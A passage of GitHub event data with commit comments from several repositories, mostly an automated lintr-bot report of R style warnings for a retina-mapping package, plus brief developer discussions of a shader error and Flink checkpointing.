{"id":"7909684609","type":"CommitCommentEvent","actor":{"login":"GoodwillDarina"},"repo":{"name":"htmlacademy-htmlcss/678015-sedona"},"payload":{"comment":{"id":29574083,"position":7,"line":12,"path":"catalog.html","commit_id":"421d5c2bc923a1c0d4766da0d8fe2a89508f4ed5","created_at":"2018-07-03T01:10:16Z","updated_at":"2018-07-03T01:10:16Z","author_association":"COLLABORATOR","body":"Не совсем понимаю, зачем еще одна обертка логотипа?"}},"created_at":"2018-07-03T01:10:16Z"}
{"id":"7909690302","type":"CommitCommentEvent","actor":{"login":"indrc"},"repo":{"name":"indrc/flink"},"payload":{"comment":{"id":29574092,"position":5,"line":42,"path":"flink-runtime/src/main/java/org/apache/flink/runtime/state/filesystem/FsStateBackendFactory.java","commit_id":"96def47c57ae58f9717ab35d41e1a4bf6d152851","created_at":"2018-07-03T01:12:39Z","updated_at":"2018-07-03T01:12:39Z","author_association":"OWNER","body":"Yes, i thought about this; it might be efficient to do a boolean comparison instead of a string comparison for each checkpoint file write at subtask level, because potentially i'd need to do an additional trim to remove spaces?"}},"created_at":"2018-07-03T01:12:39Z"}
{"id":"7909690905","type":"CommitCommentEvent","actor":{"login":"laawdhavemercy"},"repo":{"name":"the-tech-academy-1/developers"},"payload":{"comment":{"id":29574094,"position":null,"line":null,"path":null,"commit_id":"d667081c1bcc0629bd73a7a0e691c0e019777b3e","created_at":"2018-07-03T01:12:54Z","updated_at":"2018-07-03T01:12:54Z","author_association":"NONE","body":"I added my name for the video."}},"created_at":"2018-07-03T01:12:54Z"}
{"id":"7909693285","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29574100,"position":null,"line":null,"path":null,"commit_id":"f9ff5c1ad60dde53d25f40a7dec83ef59b422560","created_at":"2018-07-03T01:13:54Z","updated_at":"2018-07-03T01:13:54Z","author_association":"CONTRIBUTOR","body":"Fix uninitialized variable. Related to issue https://github.com/rism-ch/verovio/issues/909."}},"created_at":"2018-07-03T01:13:54Z"}
{"id":"7909696842","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29574107,"position":null,"line":null,"path":null,"commit_id":"295395c680402978cc61f42aa0e156dd59df3b79","created_at":"2018-07-03T01:15:21Z","updated_at":"2018-07-03T01:15:21Z","author_association":"NONE","body":"OK, so I now require a core profile 3.0 context for both Linux and Windows with the non-OIT Reicast core.\r\n\r\nI made this diff patch -\r\n\r\nhttps://hastebin.com/totatusihu.diff\r\n\r\nThe error I now get back from the GLSL runtime compiler is -\r\n\r\n> Shader linking: failed to link\r\n>  (120 bytes), - Link info\r\n> ---------\r\n> error: interpolation modifier mismatch for varying parameter (named vtx_base) between shader stages\r\n>  -\r\n> [libretro INFO] Fatal error : shader compile fail\r\n> \r\n>  in gl_CompileAndLink -> core/rend/gles/gles.cpp : 411\r\n> DEBUGBREAK!\r\n\r\nAny thoughts?"}},"created_at":"2018-07-03T01:15:21Z"}
{"id":"7909702535","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bc/retina"},"payload":{"comment":{"id":29574125,"position":null,"line":null,"path":null,"commit_id":"002662d3eea76706eb6de58bc2991e242e85456e","created_at":"2018-07-03T01:17:37Z","updated_at":"2018-07-03T01:17:37Z","author_association":"NONE","body":"[inst/extdata/asalmon_mcw/main.r:2:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L2) *style:* **Variable or function name should be snake_case.**\n```r\n​LAMBDA_var <- 0.1 #Thin plate spline smoothing. Lambda=0 would be interpolation.\n^~~~~~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:3:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L3) *style:* **Variable or function name should be snake_case.**\n```r\n​RESOLUTION_var <- 500 #Plot width in pixels\n^~~~~~~~~~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:5:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L5) *style:* **Lines should not be more than 80 characters.**\n```r\n​#TODO change path. make sure this main.r script is just outside the diagram_retina folder.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:8:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L8) *style:* **Lines should not be more than 80 characters.**\n```r\n​#todo verify these. see the tutorial here: https://github.com/bc/retina/blob/master/tutorial.md search for the part that starts with \"#[V point of the tear,\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:10:10:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L10) *style:* **Commas should always have a space after.**\n```r\n​    c(59,52,67),\n         ^\n```\n[inst/extdata/asalmon_mcw/main.r:10:13:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L10) *style:* **Commas should always have a space after.**\n```r\n​    c(59,52,67),\n            ^\n```\n[inst/extdata/asalmon_mcw/main.r:11:10:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L11) *style:* **Commas should always have a space after.**\n```r\n​    c(79,73,85),\n         ^\n```\n[inst/extdata/asalmon_mcw/main.r:11:13:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L11) *style:* **Commas should always have a space after.**\n```r\n​    c(79,73,85),\n            ^\n```\n[inst/extdata/asalmon_mcw/main.r:12:10:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L12) *style:* **Commas should always have a space after.**\n```r\n​    c(34,31,37))\n         ^\n```\n[inst/extdata/asalmon_mcw/main.r:12:13:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L12) *style:* **Commas should always have a space after.**\n```r\n​    c(34,31,37))\n            ^\n```\n[inst/extdata/asalmon_mcw/main.r:15:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L15) *style:* **Lines should not be more than 80 characters.**\n```r\n​assemble_markup_file('left', path_to_retina_data_folder, nasal_outline_index=1, dorsal_outline_index=NA)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:15:22:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L15) *style:* **Only use double-quotes.**\n```r\n​assemble_markup_file('left', path_to_retina_data_folder, nasal_outline_index=1, dorsal_outline_index=NA)\n                     ^~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:15:77:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L15) *style:* **Put spaces around all infix operators.**\n```r\n​assemble_markup_file('left', path_to_retina_data_folder, nasal_outline_index=1, dorsal_outline_index=NA)\n                                                                           ~^~\n```\n[inst/extdata/asalmon_mcw/main.r:15:101:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L15) *style:* **Put spaces around all infix operators.**\n```r\n​assemble_markup_file('left', path_to_retina_data_folder, nasal_outline_index=1, dorsal_outline_index=NA)\n                                                                                                   ~^~\n```\n[inst/extdata/asalmon_mcw/main.r:29:21:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L29) *style:* **Commas should never have a space before.**\n```r\n​        height = 45 ,# height of the counting frame in microns\n                   ~^\n```\n[inst/extdata/asalmon_mcw/main.r:29:22:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L29) *style:* **Commas should always have a space after.**\n```r\n​        height = 45 ,# height of the counting frame in microns\n                     ^\n```\n[inst/extdata/asalmon_mcw/main.r:34:28:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L34) *style:* **Commas should never have a space before.**\n```r\n​        extrapolate = TRUE ,          #Predicts densities to the equator.\n                          ~^\n```\n[inst/extdata/asalmon_mcw/main.r:36:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L36) *style:* **Lines should not be more than 80 characters.**\n```r\n​        rotation_ccw = -90, # when set to -90 degrees, the rotation is unaltered from the measured orientation.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/extdata/asalmon_mcw/main.r:37:22:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L37) *style:* **Put spaces around all infix operators.**\n```r\n​        plot_suppress=TRUE)\n                    ~^~\n```\n[inst/extdata/asalmon_mcw/main.r:39:29:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L39) *style:* **Put spaces around all infix operators.**\n```r\n​retinaplot(my_retina, lambda=0.001, polynomial_m=   2, rotation=0)\n                           ~^~\n```\n[inst/extdata/asalmon_mcw/main.r:39:49:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L39) *style:* **Put spaces around all infix operators.**\n```r\n​retinaplot(my_retina, lambda=0.001, polynomial_m=   2, rotation=0)\n                                               ~^\n```\n[inst/extdata/asalmon_mcw/main.r:39:64:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L39) *style:* **Put spaces around all infix operators.**\n```r\n​retinaplot(my_retina, lambda=0.001, polynomial_m=   2, rotation=0)\n                                                              ~^~\n```\n[inst/extdata/asalmon_mcw/main.r:40:10:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L40) *style:* **Put spaces around all infix operators.**\n```r\n​par(mfrow=c(2,2))\n        ~^~\n```\n[inst/extdata/asalmon_mcw/main.r:40:15:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/inst/extdata/asalmon_mcw/main.r#L40) *style:* **Commas should always have a space after.**\n```r\n​par(mfrow=c(2,2))\n              ^\n```\n[R/composite.R:2:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L2) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description This is a subfunction, that is useful when creating average maps.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/composite.R:3:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L3) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param retina_list A list containing retina objects, with names(retina_list) all defined.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/composite.R:4:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L4) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param rotation_indices Each value in this vector will correspond to the amount of rotation applied to each retina in the list.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/composite.R:5:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L5) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param ... Arguments passed from other functions. You can access the thin plate spline interpolator here.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/composite.R:6:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L6) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @return sum_mat The sum of all retina objects in the list, with respect to the rotation indices.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/composite.R:9:16:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L9) *warning:* **no visible global function definition for ‘mat_from_ret_obj’**\n```r\n​    sum_mat <- mat_from_ret_obj(retina_list[[1]], rotation = 0, ...)\n               ^~~~~~~~~~~~~~~~\n```\n[R/composite.R:12:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L12) *style:* **Lines should not be more than 80 characters.**\n```r\n​        sum_mat <- sum_mat + mat_from_ret_obj(retina_list[[i]], rotation_indices[i], \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/composite.R:12:85:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/composite.R#L12) *style:* **Trailing whitespace is superfluous.**\n```r\n​        sum_mat <- sum_mat + mat_from_ret_obj(retina_list[[i]], rotation_indices[i], \n                                                                                    ^\n```\n[R/matrix_retobj.R:3:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L3) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' You can decide how much to rotate the retina before returning the matrix. You can also pass arguments to the polar plotter.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:6:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L6) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param n the number by which to divide the matrix by. Useful when generating partial averages.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:7:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L7) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param reflect logical, by default it is TRUE, in order to view the retina from outside the eye (rather than from within.)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:12:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L12) *style:* **Lines should not be more than 80 characters.**\n```r\n​mat_from_ret_obj <- function(retina_object, rotation = 0, n = 1, reflect = TRUE, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:12:81:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L12) *style:* **Trailing whitespace is superfluous.**\n```r\n​mat_from_ret_obj <- function(retina_object, rotation = 0, n = 1, reflect = TRUE, \n                                                                                ^\n```\n[R/matrix_retobj.R:17:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L17) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/matrix_retobj.R:20:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L20) *style:* **Lines should not be more than 80 characters.**\n```r\n​    az <- mapproject(x = retina_object$trimmed_data[, 2], retina_object$trimmed_data[, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:20:87:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​    az <- mapproject(x = retina_object$trimmed_data[, 2], retina_object$trimmed_data[, \n                                                                                      ^\n```\n[R/matrix_retobj.R:25:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L25) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/matrix_retobj.R:27:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L27) *style:* **Lines should not be more than 80 characters.**\n```r\n​    map2fit <- fit_plot_azimuthal(x2, y2, z2, plot_suppress = TRUE, extrapolate = TRUE, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:27:88:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​    map2fit <- fit_plot_azimuthal(x2, y2, z2, plot_suppress = TRUE, extrapolate = TRUE, \n                                                                                       ^\n```\n[R/matrix_retobj.R:28:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L28) *style:* **Lines should not be more than 80 characters.**\n```r\n​        outer_radius = pi/2, falciform_coords = retina_object$azimuthal_data.falciform[[1]], \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/matrix_retobj.R:28:26:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​        outer_radius = pi/2, falciform_coords = retina_object$azimuthal_data.falciform[[1]], \n                        ~^~\n```\n[R/matrix_retobj.R:28:93:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L28) *style:* **Trailing whitespace is superfluous.**\n```r\n​        outer_radius = pi/2, falciform_coords = retina_object$azimuthal_data.falciform[[1]], \n                                                                                            ^\n```\n[R/matrix_retobj.R:30:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L30) *style:* **Variable or function name should be snake_case.**\n```r\n​    MAT <- map2fit[[2]]$z\n    ^~~\n```\n[R/matrix_retobj.R:32:15:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/matrix_retobj.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​    return(MAT/n)\n             ~^~\n```\n[R/plotting_functions.R:3:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L3) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' Extracts xy and falciform coordinates from datapoints collected from retistruct. Falc and Datapoints are stacked upon one another\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:5:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L5) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param datapoints_from_retistruct data structure that comes from the datapoints.csv, which is automatically generated by Retistruct.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:7:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L7) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @return L list of pixel xy positions, and falciform coordinates in [1] and [2], respectively\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:9:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L9) *style:* **Lines should not be more than 80 characters.**\n```r\n​extract_xy_and_falciform <- function(datapoints_from_retistruct, number_of_sampling_sites) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:10:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L10) *style:* **Lines should not be more than 80 characters.**\n```r\n​    pixel_xy_positions <- datapoints_from_retistruct[1:number_of_sampling_sites, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:10:81:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L10) *style:* **Trailing whitespace is superfluous.**\n```r\n​    pixel_xy_positions <- datapoints_from_retistruct[1:number_of_sampling_sites, \n                                                                                ^\n```\n[R/plotting_functions.R:12:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L12) *style:* **Lines should not be more than 80 characters.**\n```r\n​    falciform_len <- length(datapoints_from_retistruct[, 1]) - length(pixel_xy_positions[, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:12:91:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L12) *style:* **Trailing whitespace is superfluous.**\n```r\n​    falciform_len <- length(datapoints_from_retistruct[, 1]) - length(pixel_xy_positions[, \n                                                                                          ^\n```\n[R/plotting_functions.R:16:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L16) *style:* **Lines should not be more than 80 characters.**\n```r\n​    falciform_coordinates <- datapoints_from_retistruct[(xy_len + 1):total_len, ]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:22:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L22) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' ImageJ values don't always show up the right way, because Y values get larger and positive while moving down the image.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:24:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L24) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param falciform_xy_coordinates 2 columns of coordinate (X,Y) data in ImageJ pixel format\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:28:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L28) *style:* **Lines should not be more than 80 characters.**\n```r\n​reflect_IJ_y_values_for_falciform <- function(falciform_xy_coordinates, xy_img_dimensions) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:28:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L28) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​reflect_IJ_y_values_for_falciform <- function(falciform_xy_coordinates, xy_img_dimensions) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:28:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L28) *style:* **Variable or function name should be snake_case.**\n```r\n​reflect_IJ_y_values_for_falciform <- function(falciform_xy_coordinates, xy_img_dimensions) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:29:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L29) *style:* **Lines should not be more than 80 characters.**\n```r\n​    falciform_xy_coordinates_transformed <- falciform_xy_coordinates  #make a copy\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:29:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L29) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    falciform_xy_coordinates_transformed <- falciform_xy_coordinates  #make a copy\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:31:52:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​    half_of_vertical_pixels <- xy_img_dimensions[2]/2\n                                                  ~^~\n```\n[R/plotting_functions.R:32:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L32) *style:* **Lines should not be more than 80 characters.**\n```r\n​    falciform_xy_coordinates_transformed$cyan <- (falc_y - half_of_vertical_pixels) * \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:32:86:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​    falciform_xy_coordinates_transformed$cyan <- (falc_y - half_of_vertical_pixels) * \n                                                                                     ^\n```\n[R/plotting_functions.R:38:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L38) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' Shows a visualization of the outline, as well as the location of each datapoint, with fit plot.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:40:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L40) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param pixel_xy_positions 2 columns of coordinate (X,Y) data in ImageJ pixel 